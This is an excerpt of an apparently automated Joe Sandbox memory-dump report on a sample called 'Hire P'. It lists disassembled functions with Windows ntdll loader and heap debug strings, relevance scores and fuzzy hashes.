                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                            • API String ID: 0-3197712848
                                                            • Opcode ID: efca52fdd6f50eca17dbcc746d5d69036b10cfbce1225ab01c55cab5ad545480
                                                            • Instruction ID: a7326e8ed4bc7e8ce260e056f6f8fca30573d9742027c93f072da23606741bf5
                                                            • Opcode Fuzzy Hash: efca52fdd6f50eca17dbcc746d5d69036b10cfbce1225ab01c55cab5ad545480
                                                            • Instruction Fuzzy Hash: D112F371A08352CFD729DF28C480BAABBE4BF95704F0549ADF9C58B291E734D944CB92
                                                            Function 01170274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                            • API String ID: 0-1700792311
                                                            • Opcode ID: 913e91e08bd327354fb8c64b9d080e45a18862b6335b94b7e6402fffdc64b029
                                                            • Instruction ID: ffc2855d4cdd807b773d4aaf49c85acf61b3be01ff40185fd86a117b11f2db48
                                                            • Opcode Fuzzy Hash: 913e91e08bd327354fb8c64b9d080e45a18862b6335b94b7e6402fffdc64b029
                                                            • Instruction Fuzzy Hash: C6D1EC31600786EFDB2ADF69C490AA9BBF1FF4A704F188059F4869B752C734E980CB14
                                                            Function 010CADE0 Relevance: 9.3, Strings: 7, Instructions: 573COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI$MZER
                                                            • API String ID: 0-664215390
                                                            • Opcode ID: e3ec5fe8e4639c1e063482bbf28e4bf1db762ec304ea2d18aeca3e6d7ba2303e
                                                            • Instruction ID: 3e1265b91b111d8478d58e2030c0f7911c6e8586dc0d391cbb362a4db9756328
                                                            • Opcode Fuzzy Hash: e3ec5fe8e4639c1e063482bbf28e4bf1db762ec304ea2d18aeca3e6d7ba2303e
                                                            • Instruction Fuzzy Hash: FD32A170E04269CBDB26CB18C895BEEBBB5BF44B80F1441E9E899A7251D7359F818F40
                                                            Function 011489B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • VerifierFlags, xrefs: 01148C50
                                                            • VerifierDlls, xrefs: 01148CBD
                                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01148A67
                                                            • VerifierDebug, xrefs: 01148CA5
                                                            • AVRF: -*- final list of providers -*- , xrefs: 01148B8F
                                                            • HandleTraces, xrefs: 01148C8F
                                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01148A3D
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                            • API String ID: 0-3223716464
                                                            • Opcode ID: f9d647630bda8483c0bf9e9f4d0f7d9d053106e4c86c9b0fdf3345ad48e3fa50
                                                            • Instruction ID: 0a62a1d83cb1d3aa0c5288f87f17379eec03100a8d5c4ecb9a8bd747b1618da1
                                                            • Opcode Fuzzy Hash: f9d647630bda8483c0bf9e9f4d0f7d9d053106e4c86c9b0fdf3345ad48e3fa50
                                                            • Instruction Fuzzy Hash: 5C9147B1A06306EFD72EEFA8C8C0B9B7BE5AB55F18F050468FA816B241C7709C41C795
                                                            Function 01144DD7 Relevance: 8.8, Strings: 7, Instructions: 86COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • LdrpGenericExceptionFilter, xrefs: 01144DFC
                                                            • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 01144E38
                                                            • minkernel\ntdll\ldrutil.c, xrefs: 01144E06
                                                            • Execute '.cxr %p' to dump context, xrefs: 01144EB1
                                                            • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 01144DF5
                                                            • LdrpProtectedCopyMemory, xrefs: 01144DF4
                                                            • ***Exception thrown within loader***, xrefs: 01144E27
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                            • API String ID: 0-2973941816
                                                            • Opcode ID: 1aebd090ce6c6f746eaaa277a6bf79624aad96d1a2b10f55785b71251eac1e78
                                                            • Instruction ID: e8e28f1c9200463874fd3f978258dbb18f485365feeb1f5eaa6238a66c58fca8
                                                            • Opcode Fuzzy Hash: 1aebd090ce6c6f746eaaa277a6bf79624aad96d1a2b10f55785b71251eac1e78
                                                            • Instruction Fuzzy Hash: 5F2168321481227FF73C9AAD8C95F667B98FB91E64F140108F261BE980CB74DD01C261
                                                            Function 010CEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                            • API String ID: 0-1109411897
                                                            • Opcode ID: 8503aa8a14e5e358bb7784359d3261ca2ab58657dfb7fae6c0de18ac30cfabba
                                                            • Instruction ID: 6c576a21c4d5a32d32ed94806f0c6bd70d5d9b60c0e90f372600e8512cddb05e
                                                            • Opcode Fuzzy Hash: 8503aa8a14e5e358bb7784359d3261ca2ab58657dfb7fae6c0de18ac30cfabba
                                                            • Instruction Fuzzy Hash: BDA24874A0566A8FDB68DF18C8887ADBBB1BF45704F1442EED94DA7690DB309E81CF01
                                                            Function 010F63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-792281065
                                                            • Opcode ID: 96cc3ae89819b2a3b3cb3ca513110bf9417558e95d8a9a3fddb5d45f43974e39
                                                            • Instruction ID: bb122d0767eed827f1255b902a931de53011330c9a34c4de2877a98cbd88fb2b
                                                            • Opcode Fuzzy Hash: 96cc3ae89819b2a3b3cb3ca513110bf9417558e95d8a9a3fddb5d45f43974e39
                                                            • Instruction Fuzzy Hash: 12915D30B017119BDB3DEF58D885BAE7BA1BF91B18F04013CE6507BA85DB75A841C791
                                                            Function 010B645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01119A01
                                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 011199ED
                                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01119A2A
                                                            • apphelp.dll, xrefs: 010B6496
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01119A11, 01119A3A
                                                            • LdrpInitShimEngine, xrefs: 011199F4, 01119A07, 01119A30
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-204845295
                                                            • Opcode ID: 436a1ff5e51d14341a79b250e33acef5aa675ac85ed739980adf5ac66a7f9290
                                                            • Instruction ID: b6ecafaff20d3bfd58c411c607e5d39bc88ef73859be617b9c3583112308b33e
                                                            • Opcode Fuzzy Hash: 436a1ff5e51d14341a79b250e33acef5aa675ac85ed739980adf5ac66a7f9290
                                                            • Instruction Fuzzy Hash: CE51E3712183089FD728DF24D891BABB7E8FB84748F40092DF5E59B194D731E944CB92
                                                            Function 010F2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • SXS: %s() passed the empty activation context, xrefs: 01132165
                                                            • RtlGetAssemblyStorageRoot, xrefs: 01132160, 0113219A, 011321BA
                                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01132178
                                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01132180
                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 011321BF
                                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0113219F
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                            • API String ID: 0-861424205
                                                            • Opcode ID: 21691e1e7edf569738767204979976a785be1cc402d1dd4fdb493d16ae34a359
                                                            • Instruction ID: 6e127fdb177a1f582d6d2d2b23d2fe43980669737708a549d70b95a3496ffef8
                                                            • Opcode Fuzzy Hash: 21691e1e7edf569738767204979976a785be1cc402d1dd4fdb493d16ae34a359
                                                            • Instruction Fuzzy Hash: A5310536B40325B7EB259A998C42F6A7B68EBA5A90F05405DFB44AB244D370DE01C6E1
                                                            Function 010FC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • Loading import redirection DLL: '%wZ', xrefs: 01138170
                                                            • LdrpInitializeProcess, xrefs: 010FC6C4
                                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 011381E5
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 010FC6C3
                                                            • LdrpInitializeImportRedirection, xrefs: 01138177, 011381EB
                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01138181, 011381F5
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                            • API String ID: 0-475462383
                                                            • Opcode ID: 53c435831351197a4f4f5a4ce973e8125717574e9833266219a374734c4f17b8
                                                            • Instruction ID: 02472dba63e018ba4b8d85e01c9022a1059ab4364075cd3145f0935ca88a5f24
                                                            • Opcode Fuzzy Hash: 53c435831351197a4f4f5a4ce973e8125717574e9833266219a374734c4f17b8
                                                            • Instruction Fuzzy Hash: 3A3125717483069FD228EF29D986E5AB7D4EFD4B14F04056CF9C56B291D720EC04C7A2
                                                            Function 0110096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 01102DF0: LdrInitializeThunk.NTDLL ref: 01102DFA
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100BA3
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100BB6
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100D60
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100D74
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                            • String ID:
                                                            • API String ID: 1404860816-0
                                                            • Opcode ID: 82d2598ec8009ac33d971c497c3154241b21281ae9f23168c7c4a038c2518ce3
                                                            • Instruction ID: 851b17f4cb71c027e1d195b89e615a79eba8706e372ee2490eea5fb9035ca3b7
                                                            • Opcode Fuzzy Hash: 82d2598ec8009ac33d971c497c3154241b21281ae9f23168c7c4a038c2518ce3
                                                            • Instruction Fuzzy Hash: FA427071900715DFDB29CF28C840BAAB7F4FF48314F1445A9E989EB285E7B0A985CF61
                                                            Function 010CA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                            • API String ID: 0-379654539
                                                            • Opcode ID: 6e1cf58f85800d0dc3ae322e7aa4058e530d143a63de08ecc13f547e6cd4d025
                                                            • Instruction ID: 37d5dce524c0e2fba15246abd82e495db571a7721696b9ee90bbe3c3332ece33
                                                            • Opcode Fuzzy Hash: 6e1cf58f85800d0dc3ae322e7aa4058e530d143a63de08ecc13f547e6cd4d025
                                                            • Instruction Fuzzy Hash: 6CC1577460838ACBD715DF58C044B6EB7E4BB98B04F04896EF9D68B251E734CA49CF52
                                                            Function 010F8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • LdrpInitializeProcess, xrefs: 010F8422
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 010F8421
                                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 010F855E
                                                            • @, xrefs: 010F8591
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-1918872054
                                                            • Opcode ID: 7a8bbfc2e2fe51a0db39d35f2124850aabf2bb0f20e9d440b1b4de0ec1631643
                                                            • Instruction ID: 5dfabe56bfb77d231692168b9260ba66100c9d621794ed4900cd4113a8538ae2
                                                            • Opcode Fuzzy Hash: 7a8bbfc2e2fe51a0db39d35f2124850aabf2bb0f20e9d440b1b4de0ec1631643
                                                            • Instruction Fuzzy Hash: 7A91BD71608345AFDB26EF25CC45EABBAE8BF84B44F40492EFAC496140E774D904CB62
                                                            Function 010F273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 011322B6
                                                            • SXS: %s() passed the empty activation context, xrefs: 011321DE
                                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 011321D9, 011322B1
                                                            • .Local, xrefs: 010F28D8
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                            • API String ID: 0-1239276146
                                                            • Opcode ID: 56a1ff63d997b5517874d3b1e41bc6f04e8f1d174ab65a9acc0b23b23a38a162
                                                            • Instruction ID: 74f3399708ea131046782e5ef1d07d06cadb9c6ad6c5824e7fb6c4f4ce7bdcf8
                                                            • Opcode Fuzzy Hash: 56a1ff63d997b5517874d3b1e41bc6f04e8f1d174ab65a9acc0b23b23a38a162
                                                            • Instruction Fuzzy Hash: E1A1D13190522ADBDB24DF68CC85BA9B3B0BF98354F1541EDDA88AB651D730DE80CF90
                                                            Function 010F4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • RtlDeactivateActivationContext, xrefs: 01133425, 01133432, 01133451
                                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01133437
                                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01133456
                                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0113342A
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                            • API String ID: 0-1245972979
                                                            • Opcode ID: 9e405a4627c99952395e1f33768686c6a9e7feaf33e513729e2733380c5d7102
                                                            • Instruction ID: 7c9476fa8fae1320ed408e567c3881944bc983d8145b604acdfa1b89965f5fbd
                                                            • Opcode Fuzzy Hash: 9e405a4627c99952395e1f33768686c6a9e7feaf33e513729e2733380c5d7102
                                                            • Instruction Fuzzy Hash: 4D6111326107069BD72ACF1CC882B2AB7E0BF80B60F15856DEEA5DB645D730E801CBD5
                                                            Function 010C64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01120FE5
                                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01121028
                                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0112106B
                                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 011210AE
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                            • API String ID: 0-1468400865
                                                            • Opcode ID: 9d2e511d342a63bc58eae4f9d741013042c613888e6659698b0a609b11b1aa62
                                                            • Instruction ID: 6e3dbe82ba4a9379c3cbbce05b2c7fcc2059d1d3c243e9333404edaf7d2a3cda
                                                            • Opcode Fuzzy Hash: 9d2e511d342a63bc58eae4f9d741013042c613888e6659698b0a609b11b1aa62
                                                            • Instruction Fuzzy Hash: E071C1719043059FCB21DF18C884F9B7BA8AFA4B54F10056CF9888B286D775D589CFD2
                                                            Function 010F4D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • minkernel\ntdll\ldrsnap.c, xrefs: 01133640, 0113366C
                                                            • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0113362F
                                                            • Querying the active activation context failed with status 0x%08lx, xrefs: 0113365C
                                                            • LdrpFindDllActivationContext, xrefs: 01133636, 01133662
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                            • API String ID: 0-3779518884
                                                            • Opcode ID: 8e7be0e1cc91367a389f058372312d35368b30c27aa57d77747f33e2a837b632
                                                            • Instruction ID: eb2de068767d90bd52a923a3454bcee08583103061ea069206cc4e17b795195d
                                                            • Opcode Fuzzy Hash: 8e7be0e1cc91367a389f058372312d35368b30c27aa57d77747f33e2a837b632
                                                            • Instruction Fuzzy Hash: 75312C329006119EEF3ABB0CC88BB6776E4BB01654F0A81ADDFD4D7AD1D7A09CC08795
                                                            Function 010E245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0112A9A2
                                                            • apphelp.dll, xrefs: 010E2462
                                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0112A992
                                                            • LdrpDynamicShimModule, xrefs: 0112A998
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-176724104
                                                            • Opcode ID: abf13d0506d4542c5818e2afaebcb7bdded9b1d115369c55b80988baf2a324bf
                                                            • Instruction ID: 1c5ca71988d748b52b917a07663a39288ea535c53b8989a5c6cb1e12b6f24173
                                                            • Opcode Fuzzy Hash: abf13d0506d4542c5818e2afaebcb7bdded9b1d115369c55b80988baf2a324bf
                                                            • Instruction Fuzzy Hash: C6316AB5B00312ABDB3D9F5AE8C5AAA7BB9FF84B04F150039E960A7244D77058D1CB40
                                                            Function 010D29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • HEAP: , xrefs: 010D3264
                                                            • HEAP[%wZ]: , xrefs: 010D3255
                                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 010D327D
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                            • API String ID: 0-617086771
                                                            • Opcode ID: 13e93c56e872e506947de913ecb2ef77dbf8ae47d3aa2ee3fca83a7311b9fca0
                                                            • Instruction ID: 475ed4feeeba332068d94cd1781b20629714955c81ecaef2b9f86ab9743b526f
                                                            • Opcode Fuzzy Hash: 13e93c56e872e506947de913ecb2ef77dbf8ae47d3aa2ee3fca83a7311b9fca0
                                                            • Instruction Fuzzy Hash: 8392BA71A043499FDB29CF68C440BAEBBF1FF48314F1880A9E999AB391D735A941CF51
                                                            Function 010D0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                            • API String ID: 0-4253913091
                                                            • Opcode ID: a9e753c644568c3631785d50caeca364d54b6d9ee0ebba7f07a6e9d39ea0238e
                                                            • Instruction ID: 99100de74a788c03772876d0d40a2bdfc7f790d6981f5bf6684758563e397acd
                                                            • Opcode Fuzzy Hash: a9e753c644568c3631785d50caeca364d54b6d9ee0ebba7f07a6e9d39ea0238e
                                                            • Instruction Fuzzy Hash: 31F1AF70A00606DFEB19CF68C894BAEB7F6FF45304F1481A8E59A9B385D734E981CB51
                                                            Function 010E6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $@
                                                            • API String ID: 0-1077428164
                                                            • Opcode ID: b35ee1ce680b83d4978cd57b717eefa04885b759fa053bb272732494fa6494ed
                                                            • Instruction ID: 52e4931020aabdec7165356128bde71e178995303650eef2eae0c0729f136ea3
                                                            • Opcode Fuzzy Hash: b35ee1ce680b83d4978cd57b717eefa04885b759fa053bb272732494fa6494ed
                                                            • Instruction Fuzzy Hash: FFC29F716083519FDB69CF29C844BAFBBE5AF88704F04892DFAC987241D775D844CB92
                                                            Function 010BA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: FilterFullPath$UseFilter$\??\
                                                            • API String ID: 0-2779062949
                                                            • Opcode ID: 011ced80e5b360036e3050f047e31221db798b0484ff6b2d64328ccc83c80db2
                                                            • Instruction ID: 2d864cebcfe6f4160263d437f8f11a5fc63a3424430284e06413e83bd80f5e33
